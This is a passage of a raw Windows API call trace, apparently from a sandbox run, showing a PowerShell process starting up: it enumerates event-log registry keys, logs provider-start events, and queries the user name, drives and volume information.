lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e4dc | out: phkResult=0x13e4dc*=0x390) returned 0x0 [0090.077] RegQueryInfoKeyW (in: hKey=0x390, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x13e544, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13e540, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x13e544*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13e540*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.077] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x0, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.078] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x1, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.078] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x2, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.078] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x3, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.078] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x4, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.078] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x5, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.078] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x6, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.078] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x7, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.078] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x8, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.078] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x32c) returned 0x0 [0090.078] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x2 [0090.079] RegOpenKeyExW (in: hKey=0x390, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x394) returned 0x0 [0090.079] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x2 [0090.079] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x398) returned 0x0 [0090.079] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x2 [0090.079] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x39c) returned 0x0 [0090.079] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x2 [0090.079] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x3a0) returned 0x0 [0090.079] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x2 [0090.080] RegOpenKeyExW (in: hKey=0x390, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x3a4) returned 0x0 [0090.080] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x2 [0090.080] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x5 [0090.082] RegOpenKeyExW (in: hKey=0x390, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x3a8) returned 0x0 [0090.082] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x2 [0090.082] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x3ac) returned 0x0 [0090.082] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x3b0) returned 0x0 [0090.082] RegCloseKey (hKey=0x3b0) returned 0x0 [0090.082] RegCloseKey (hKey=0x390) returned 0x0 [0090.083] RegCloseKey (hKey=0x3ac) returned 0x0 [0090.083] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e4d0 | out: phkResult=0x13e4d0*=0x3ac) returned 0x0 [0090.083] RegQueryInfoKeyW (in: hKey=0x3ac, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x13e538, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13e534, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x13e538*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13e534*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.083] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x0, lpName=0x3953b0, lpcchName=0x13e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x13e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.083] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x1, lpName=0x3953b0, lpcchName=0x13e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x13e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.083] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x2, lpName=0x3953b0, lpcchName=0x13e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x13e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.083] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x3, lpName=0x3953b0, lpcchName=0x13e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x13e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.083] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x4, lpName=0x3953b0, lpcchName=0x13e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x13e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.083] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x5, lpName=0x3953b0, lpcchName=0x13e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x13e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.084] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x6, lpName=0x3953b0, lpcchName=0x13e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x13e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.084] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x7, lpName=0x3953b0, lpcchName=0x13e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x13e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.084] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x8, lpName=0x3953b0, lpcchName=0x13e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x13e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.084] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x390) returned 0x0 [0090.084] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x0) returned 0x2 [0090.084] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x3b0) returned 0x0 [0090.084] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x0) returned 0x2 [0090.084] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x3b4) returned 0x0 [0090.084] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x0) returned 0x2 [0090.084] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x3b8) returned 0x0 [0090.085] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x0) returned 0x2 [0090.085] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x3bc) returned 0x0 [0090.085] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x0) returned 0x2 [0090.085] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x3c0) returned 0x0 [0090.085] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x0) returned 0x2 [0090.085] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x0) returned 0x5 [0090.087] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x3c4) returned 0x0 [0090.087] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x0) returned 0x2 [0090.087] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x3c8) returned 0x0 [0090.087] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e500 | out: phkResult=0x13e500*=0x3cc) returned 0x0 [0090.087] RegCloseKey (hKey=0x3cc) returned 0x0 [0090.087] RegCloseKey (hKey=0x3ac) returned 0x0 [0090.088] RegCloseKey (hKey=0x3c8) returned 0x0 [0090.090] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x5190004 [0090.092] GetLastError () returned 0x0 [0090.093] ReportEventW (hEventLog=0x5190004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3657fc4*="WSMan", lpRawData=0x3657e6c) returned 1 [0090.095] GetLastError () returned 0x0 [0090.096] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.096] GetLastError () returned 0xcb [0090.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e074, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.096] GetLastError () returned 0xcb [0090.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.096] GetLastError () returned 0xcb [0090.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.096] GetLastError () returned 0xcb [0090.096] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x37b268, nSize=0x13e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x13e674) returned 0x1 [0090.097] GetLastError () returned 0xcb [0090.097] GetUserNameW (in: lpBuffer=0x3953b0, pcbBuffer=0x13e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x13e67c) returned 1 [0090.097] ReportEventW (hEventLog=0x5190004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x365bea0*="Alias", lpRawData=0x365bd5c) returned 1 [0090.097] GetLastError () returned 0x0 [0090.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.098] GetLastError () returned 0xcb [0090.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e074, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.098] GetLastError () returned 0xcb [0090.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.098] GetLastError () returned 0xcb [0090.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.098] GetLastError () returned 0xcb [0090.098] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x37b268, nSize=0x13e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x13e674) returned 0x1 [0090.098] GetLastError () returned 0xcb [0090.098] GetUserNameW (in: lpBuffer=0x3953b0, pcbBuffer=0x13e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x13e67c) returned 1 [0090.099] ReportEventW (hEventLog=0x5190004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x365fe34*="Environment", lpRawData=0x365fcf0) returned 1 [0090.099] GetLastError () returned 0x0 [0090.100] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x13e1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0090.100] GetLastError () returned 0xcb [0090.100] SetErrorMode (uMode=0x1) returned 0x1 [0090.100] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x13e624 | out: lpFileInformation=0x13e624*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0090.100] GetLastError () returned 0xcb [0090.100] SetErrorMode (uMode=0x1) returned 0x1 [0090.101] GetLogicalDrives () returned 0x4 [0090.101] GetLastError () returned 0xcb [0090.102] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x13e0c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0090.102] GetLastError () returned 0xcb [0090.102] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0090.102] GetLastError () returned 0xcb [0090.102] SetErrorMode (uMode=0x1) returned 0x1 [0090.103] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3954b0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x13e5f0, lpMaximumComponentLength=0x13e5ec, lpFileSystemFlags=0x13e5e8, lpFileSystemNameBuffer=0x3953b0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x13e5f0*=0x9c354b42, lpMaximumComponentLength=0x13e5ec*=0xff, lpFileSystemFlags=0x13e5e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0090.103] GetLastError () returned 0xcb [0090.103] SetErrorMode (uMode=0x1) returned 0x1 [0090.103] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0090.103] GetLastError () returned 0xcb [0090.103] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x13e150, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0090.103] GetLastError () returned 0xcb [0090.103] SetErrorMode (uMode=0x1) returned 0x1 [0090.103] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x366106c | out: lpFileInformation=0x366106c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0090.103] GetLastError () returned 0xcb [0090.103] SetErrorMode (uMode=0x1) returned 0x1 [0090.103] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x13e150, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0090.103] GetLastError () returned 0xcb [0090.103] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x13e0dc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0090.103] GetLastError () returned 0xcb [0090.103] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0090.103] GetLastError () returned 0xcb [0090.104] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x13e098, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0090.104] GetLastError () returned 0xcb [0090.104] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0090.104] GetLastError () returned 0xcb [0090.105] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x13e0a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0090.105] GetLastError () returned 0xcb [0090.105] SetErrorMode (uMode=0x1) returned 0x1 [0090.105] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3661cc4 | out: lpFileInformation=0x3661cc4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0090.105] GetLastError () returned 0xcb [0090.105] SetErrorMode (uMode=0x1) returned 0x1 [0090.105] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x13e0a8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0090.105] GetLastError () returned 0xcb [0090.105] SetErrorMode (uMode=0x1) returned 0x1 [0090.105] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3661e14 | out: lpFileInformation=0x3661e14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0090.105] GetLastError () returned 0xcb [0090.105] SetErrorMode (uMode=0x1) returned 0x1 [0090.105] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x13e0ec, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0090.105] GetLastError () returned 0xcb [0090.105] SetErrorMode (uMode=0x1) returned 0x1 [0090.106] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3661fb4 | out: lpFileInformation=0x3661fb4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0090.106] GetLastError () returned 0xcb [0090.106] SetErrorMode (uMode=0x1) returned 0x1 [0090.106] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x37b268, nSize=0x13e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x13e674) returned 0x1 [0090.106] GetLastError () returned 0xcb [0090.106] GetUserNameW (in: lpBuffer=0x3953b0, pcbBuffer=0x13e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x13e67c) returned 1 [0090.106] ReportEventW (hEventLog=0x5190004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3664d3c*="FileSystem", lpRawData=0x3664bf8) returned 1 [0090.106] GetLastError () returned 0x0 [0090.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.107] GetLastError () returned 0xcb [0090.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.107] GetLastError () returned 0xcb [0090.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.107] GetLastError () returned 0xcb [0090.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.107] GetLastError () returned 0xcb [0090.107] GetUserNameExW (in: 